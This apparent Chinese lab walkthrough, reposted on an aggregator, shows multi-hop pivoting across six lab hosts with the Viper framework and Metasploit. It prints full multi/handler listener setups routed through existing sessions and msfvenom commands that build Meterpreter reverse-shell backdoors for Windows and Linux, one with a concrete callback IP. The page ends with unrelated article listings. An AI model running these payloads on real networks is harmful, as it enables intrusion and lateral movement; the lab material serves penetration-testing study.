Viper+MSF:靶机代理转发上线学习

news2024/12/28 5:11:26

本文仅为代理转发学习,在本地环境测试验证,无其它目的,请勿用于未经授权的测试


说明:

之前学习的代理转发上线,近期也做实验通过Viper,利用MSF实现了多重代理转发上线靶机,过程有些繁琐,但自我感觉对于学习代理转发还是挺有用的,同时推荐一下这个Viper工具,图形化的界面不仅炫酷而且实用:Viper:https://www.yuque.com/vipersec/。

环境说明:

Win7_1
IP1:172.10.10.3
IP2:10.10.10.3
WinServer
IP1:10.10.10.5
IP2:172.26.26.5
Win7_2
IP1:172.26.26.6
IP2:192.168.1.6
Ubuntu1
IP1:172.10.10.8
IP2:10.10.10.8
Ubuntu2
IP1:10.10.10.10
IP2:172.26.26.10
Ubuntu3
IP1:172.26.26.7
IP2:192.168.1.7
拓扑图
在这里插入图片描述

实验过程:

  1. 打开Viper,新建监听
    在这里插入图片描述

  2. 生成exe,并上传至Win7_1中执行
    在这里插入图片描述
    在这里插入图片描述

  3. 返回Viper查看,Win7_1已上线:
    在这里插入图片描述

  4. 查看当前靶机IP信息:
    方法一:
    在这里插入图片描述
    在这里插入图片描述
    方法二:
    进入【MSFCONSOLE】——进入Session——输入【ifconfig】
    在这里插入图片描述

  5. 选择Win7_1的Sessions进行内网探测:
    方法一:
    在这里插入图片描述
    执行后可在拓扑图中查看结果:
    在这里插入图片描述
    方法二:
    进入【MSFCONSOLE】——进入Session——输入:run post/windows/gather/arp_scanner RHOSTS=探测网段/IP
    在这里插入图片描述

  6. 查看到内网另一网段存在的IP,开始进行上线内网的WinServer,在此也可以执行路由添加直接使用msf探测或者挂Socks代理,此处仅作添加路由展示:
    方法一:
    在这里插入图片描述
    在这里插入图片描述
    方法二:
    进入【MSFCONSOLE】——进入Session——输入:run post/multi/manage/autoroute
    在这里插入图片描述

  7. 上线WinServer前,需要进行代理转发上线,利用Win7_1的session进行代理转发上线,输入以下命令,生成监听:

msf6 auxiliary(server/socks_proxy) > use exploit/multi/handler 					//使用攻击模块
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp			//设置Payload
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST x.x.x.x			//设置IP为边界机的内网IP,即Win7的内网IPx.x.x.x
LHOST => x.x.x.x
msf6 exploit(multi/handler) > set LPORT 1234			//设置边界机的端口
LPORT => 1234
msf6 exploit(multi/handler) > set ReverseListenerComm 1			//将此设置应用在Win7的session上
ReverseListenerComm => 1
msf6 exploit(multi/handler) > run			//运行
[*] Started reverse TCP handler on x.x.x.x:1234 via the meterpreter on session 1

在这里插入图片描述

  1. 生成监听后,再使用msfvenom生成后门程序,此处使用其他的msfvenom生成后门exe,命令如下:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=1234 -f exe > WinServer.exe
//参数对照【步骤7】中的参数

在这里插入图片描述

  1. 将生成的后门程序上传至WinServer,并执行:
    在这里插入图片描述

  2. 返回Viper查看,WinServer已上线:
    在这里插入图片描述

  3. 再次使用【步骤4】、【步骤5】、【步骤6】的方法进行内网IP探测和添加路由,过程不详述:
    在这里插入图片描述

  4. 准备上线Win7_2,上线Win7_2需要使用WinServer进行代理转发,方法类似【步骤7】:

msf6 > use exploit/multi/handler 					//使用攻击模块
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp			//设置Payload
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST x.x.x.x			//设置IP为边界机的内网IP,即WinServer的内网IPx.x.x.x
LHOST => x.x.x.x
msf6 exploit(multi/handler) > set LPORT 1234			//设置边界机的端口
LPORT => 1234
msf6 exploit(multi/handler) > set ReverseListenerComm 2			//将此设置应用在WinServer的session上
ReverseListenerComm => 2
msf6 exploit(multi/handler) > run			//运行
[*] Started reverse TCP handler on x.x.x.x:1234 via the meterpreter on session 2

在这里插入图片描述

  1. 按照【步骤8】生成Win7_2的后门程序,并上传至Win7_2执行:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=1234 -f exe > Win7_2.exe
//参数对照【步骤7】中的参数

在这里插入图片描述
在这里插入图片描述

  1. 返回Viper查看Win7_2已上线:
    在这里插入图片描述

  2. 再次使用【步骤4】、【步骤5】、【步骤6】的方法进行内网IP探测和添加路由,过程不详述:
    在这里插入图片描述

  3. 当前拓扑如下:
    在这里插入图片描述

  4. 开始上线Ubuntu1,Ubuntu1可以直接使用Viper上线,新建监听:
    在这里插入图片描述

  5. 使用msfvenom生成属于Ubuntu1的后门,方法参照【步骤8】命令如下,并上传至Ubuntu1添加执行权限并执行:
    msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=120.48.85.78 LPORT=7002 -f elf > Ubuntu1.elf在这里插入图片描述

  6. 返回Viper查看Ubuntu1已上线:

  7. 开始上线Ubuntu2,Ubuntu2上线需要使用Ubuntu1或者Win7_1的session作为代理转发上线,此处分别使用Ubuntu1作为代理转发上线和Win7_1作为代理转发上线,方法类似【步骤7】:
    方法一:使用Ubuntu1作为代理转发上线
    此步骤忘整理了,参考【步骤21】
    方法二:使用Win7_1作为代理转发上线

msf6 > use exploit/multi/handler 					//使用攻击模块
msf6 exploit(multi/handler) > set payload linux/x64/meterpreter_reverse_tcp			//设置Payload
payload => linux/x64/meterpreter_reverse_tcp
msf6 exploit(multi/handler) > set LHOST x.x.x.x			//设置IP为边界机的内网IP,即Win7_1的内网IPx.x.x.x
LHOST => x.x.x.x
msf6 exploit(multi/handler) > set LPORT 1234			//设置边界机的端口
LPORT => 1234
msf6 exploit(multi/handler) > set ReverseListenerComm 1			//将此设置应用在Win7_1的session上
ReverseListenerComm => 1
msf6 exploit(multi/handler) > run			//运行
[*] Started reverse TCP handler on x.x.x.x:1234 via the meterpreter on session 1

使用msfvenom生成Ubuntu2的后门,上传至Ubuntu2,添加执行权限并执行:

`msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=x.x.x.x LPORT=1234 -f elf > Ubuntu2_Ubuntu1.elf`![在这里插入图片描述](https://img-blog.csdnimg.cn/e0312d9dce194151995c5f507c4c8632.png)

返回查看viper已上线:
在这里插入图片描述

  1. 开始上线Ubuntu3,Ubuntu3上线需要使用Ubuntu2或者WinServer的session作为代理转发上线,此处分别使用Ubuntu2作为代理转发上线和WinServer作为代理转发上线,方法类似【步骤7】:
    方法一:使用Ubuntu2作为代理转发上线
msf6 > use exploit/multi/handler 					//使用攻击模块
msf6 exploit(multi/handler) > set payload linux/x64/meterpreter_reverse_tcp			//设置Payload
payload => linux/x64/meterpreter_reverse_tcp
msf6 exploit(multi/handler) > set LHOST x.x.x.x			//设置IP为边界机的内网IP,即Ubuntu2的内网IPx.x.x.x
LHOST => x.x.x.x
msf6 exploit(multi/handler) > set LPORT 1234			//设置边界机的端口
LPORT => 1234
msf6 exploit(multi/handler) > set ReverseListenerComm 1			//将此设置应用在Ubuntu2的session上
ReverseListenerComm => 1
msf6 exploit(multi/handler) > run			//运行
[*] Started reverse TCP handler on x.x.x.x:1234 via the meterpreter on session 1

在这里插入图片描述
使用msfvenom生成Ubuntu3的后门,上传至Ubuntu3,添加执行权限并执行:

msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=x.x.x.x LPORT=1234 -f elf > Ubuntu3_Ubuntu2.elf

在这里插入图片描述
返回查看viper已上线:
在这里插入图片描述
方法二:使用WinServer作为代理转发上线

msf6 > use exploit/multi/handler 					//使用攻击模块
msf6 exploit(multi/handler) > set payload linux/x64/meterpreter_reverse_tcp			//设置Payload
payload => linux/x64/meterpreter_reverse_tcp
msf6 exploit(multi/handler) > set LHOST x.x.x.x			//设置IP为边界机的内网IP,即WinServer的内网IPx.x.x.x
LHOST => x.x.x.x
msf6 exploit(multi/handler) > set LPORT 1234			//设置边界机的端口
LPORT => 1234
msf6 exploit(multi/handler) > set ReverseListenerComm 2			//将此设置应用在WinServer的session上
ReverseListenerComm => 2
msf6 exploit(multi/handler) > run			//运行
[*] Started reverse TCP handler on x.x.x.x:1234 via the meterpreter on session 2

在这里插入图片描述
使用msfvenom生成Ubuntu3的后门,上传至Ubuntu3,添加执行权限并执行:

msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=x.x.x.x LPORT=1234 -f elf > Ubuntu3_WinServer.elf

在这里插入图片描述
返回查看viper已上线:
在这里插入图片描述

本文完结:

至此,一共6台主机已全部上线,此文章仅作代理上线学习,真实过程肯定不止如此简单,还需要多学习学习。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/342148.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

【Linux】-- 进程信号(认识、应用)

目录 信号初识 生活中的信号 Linux中的信号 产生信号 核心转储 软件条件产生信号的样例 系统调用接口 raise kill abort 闹钟 硬件异常产生信号 如何理解除0错误 如何理解野指针 / 越界错误 总结 信号初识 (信号和信号量是两个东西) 生…

java web命令学习笔记

本博文源于笔者自学java web,博文包含了jsp脚本代码、jsp声明、jsp表达式、注释、jsp指令等内容说明,并书写对应的案例。即可观看,也可收藏。 文章目录1.jsp脚本代码2.JSP声明3.jsp表达式4.注释5.JSP指令5.1 page指令5.2 include指令1.jsp脚本…

《霍格沃茨之遗》席卷Steam周榜 哈迷们出手了!

自上上周起,《霍格沃茨之遗》就打败了长期霸榜王Steam Deck,夺得了Steam周榜冠军,果然魔法的力量不容小觑。 而在最新公开的周榜(2 月 6 日~2 月 12 日)中,《霍格沃茨之遗》更是强势席卷榜单,四…

​网易游戏实时 HTAP 计费风控平台建设

本文整理自网易互娱资深工程师, Flink Contributor, CDC Contributor 林佳,在 FFA 实时风控专场的分享。本篇内容主要分为五个部分: 实时风控业务会话会话关联的 Flink 实现HTAP 风控平台建设提升风控结果数据能效发展历程与展望未来 众所周知&#xff…

【GlobalMapper精品教程】045:空间操作(2)——相交(Intersect)

GlobalMapper提供的空间分析(操作)的方法有:交集、并集、单并集、差异、对称差集、相交、重叠、接触、包含、等于、内部、分离等,本文主要讲述相交工具的使用。 文章目录 一、实验数据二、符号化设置三、相交运算四、结果展示五、心灵感悟一、实验数据 加载配套实验数据(…

初始C++(三):引用

文章目录一.引用的概念二.引用的使用1.引用作为输出型参数2. 引用作为函数返回值3.const引用三.引用的一些小问题四.引用和指针五.引用和指针的区别一.引用的概念 引用的作用是给一个已经存在的变量取别名,编译器不会为引用变量开空间,引用变量和被他引…

一般人我劝你不要自学软件测试!!!

本人5年测试经验,在学测试之前对电脑的认知也就只限于上个网,玩个办公软件。这里不能跑题,我为啥说:自学软件测试,一般人我还是劝你算了吧?因为我就是那个一般人! 软件测试基础真的很简单&…

九龙证券|“春季躁动”行情要来?1月新增投资者数大增

新增投资者数量在上一年12月触及多年新低后,2023年1月份开端呈现反弹。 在新增投资者数量之外,近段时刻以来,包含A股商场股票成交额、北向资金净买入额、两融资金规划及成交额在内多个商场目标也呈现回暖的特征,目前A股商场交投氛…

SQL数据查询——连接查询

文章目录一、等值和非等值连接查询1.等值连接查询2.非等值连接查询二、自连接与非自连接三、内连接与外连接1.内连接2.外连接使用左外连接还是右外连接?满外连接四、UNION 的使用使用 UNION 还是 UNION ALL ?五、各种形式集合关系的SQL实现六、语法差异注…

动态SQL使用【JavaEE】

动态SQL使用 1. if 标签 判断一个参数是否有值&#xff0c;如果没值&#xff0c;那么就会隐藏 if 中的 sql 语法&#xff1a; <if test"username!null">username#{username} </if>表达式&#xff1a;username 的参数是否为空 如果结果为 true&#xff0c…

minio前后端分离上传视频/上传大文件——前后端分离断点续传minio分片上传实现

&#x1f340;&#x1f340;&#x1f340;&#x1f340;分布式文件系统-minio&#xff1a; 第一章&#xff1a;分布式文件系统介绍与minio介绍与使用&#xff08;附minio java client 使用&#xff09;第二章&#xff1a;minio&前后端分离上传视频/上传大文件——前后端分离…

网络协议(六):网络层

网络协议系列文章 网络协议(一)&#xff1a;基本概念、计算机之间的连接方式 网络协议(二)&#xff1a;MAC地址、IP地址、子网掩码、子网和超网 网络协议(三)&#xff1a;路由器原理及数据包传输过程 网络协议(四)&#xff1a;网络分类、ISP、上网方式、公网私网、NAT 网络…

【Spark分布式内存计算框架——Spark Core】10. Spark 内核调度(中)

8.3 Spark Shuffle 首先回顾MapReduce框架中Shuffle过程&#xff0c;整体流程图如下 Spark在DAG调度阶段会将一个Job划分为多个Stage&#xff0c;上游Stage做map工作&#xff0c;下游Stage做reduce工作&#xff0c;其本质上还是MapReduce计算框架。Shuffle是连接map和reduce之…

全国空气质量排行,云贵川和西藏新疆等地空气质量更好

哈喽&#xff0c;大家好&#xff0c;春节刚刚过去&#xff0c;不知道大家是不是都开始进入工作状态了呢&#xff1f;春节期间&#xff0c;允许燃放烟花爆竹的地区的朋友们不知道都去欣赏烟花表演没有&#xff1f;其他地区的朋友们相比烟花表演可能更关心燃放烟花爆竹造成的环境…

浅谈前端设计模式:策略模式和状态模式的异同点

一、策略模式 策略模式是定义一系列的算法,把它们一个个封装起来, 并且使它们可相互替换。 而且策略模式是重构小能力&#xff0c;特别适合拆分“胖逻辑”。 这个定义乍一看会有点懵&#xff0c;不过通过下面的例子就能慢慢理解它的意思。 先来看一个真实场景 某次活动要做…

测试2年还拿实习生的薪资打发我,你后悔去吧····

20年7月大学毕业&#xff0c;学的计算机科学专业。因为考研之后&#xff0c;秋招结束了。没什么更多的岗位选择&#xff0c;就想找个工作先干着&#xff0c;然后亲戚在一家大厂公司上班说要招测试&#xff0c;所以就来做测试了。 虽然都是属于计算机大类&#xff0c;但自己专业…

记一次 .NET 某游戏网站 CPU爆高分析

一&#xff1a;背景 1. 讲故事 这段时间经常有朋友微信上问我这个真实案例分析连载怎么不往下续了&#xff0c;关注我的朋友应该知道&#xff0c;我近二个月在研究 SQLSERVER&#xff0c;也写了十多篇文章&#xff0c;为什么要研究这东西呢&#xff1f; 是因为在 dump 中发现…

零入门kubernetes网络实战-13->同一宿主机上的两个网络命名空间通信方案

《零入门kubernetes网络实战》视频专栏地址 https://www.ixigua.com/7193641905282875942 本篇文章视频地址(稍后上传) 本篇文章主要是想模拟一下&#xff0c;在同一个宿主机上&#xff0c;多个网络命名空间之间如何通信&#xff1f; 有哪些可以采取的方案。 可能存在的方案…

【GD32F427开发板试用】6. 定时器运用之精确定时1s

本篇文章来自极术社区与兆易创新组织的GD32F427开发板评测活动&#xff0c;更多开发板试用活动请关注极术社区网站。作者&#xff1a;hehung 之前发帖 【GD32F427开发板试用】1. 串口实现scanf输入控制LED 【GD32F427开发板试用】2. RT-Thread标准版移植 【GD32F427开发板试用…

MySQL:连explain的type类型都没搞清楚,怎敢说精通SQL优化?

我们在使用SQL语句查询表数据时&#xff0c;提前用explain进行语句分析是一个非常好的习惯。通过explain输出sql的详细执行信息&#xff0c;就可以针对性的进行sql优化。 今天我们来分析一下&#xff0c;在explain中11种不同type代表的含义以及其应用场景。 1&#xff0c;sys…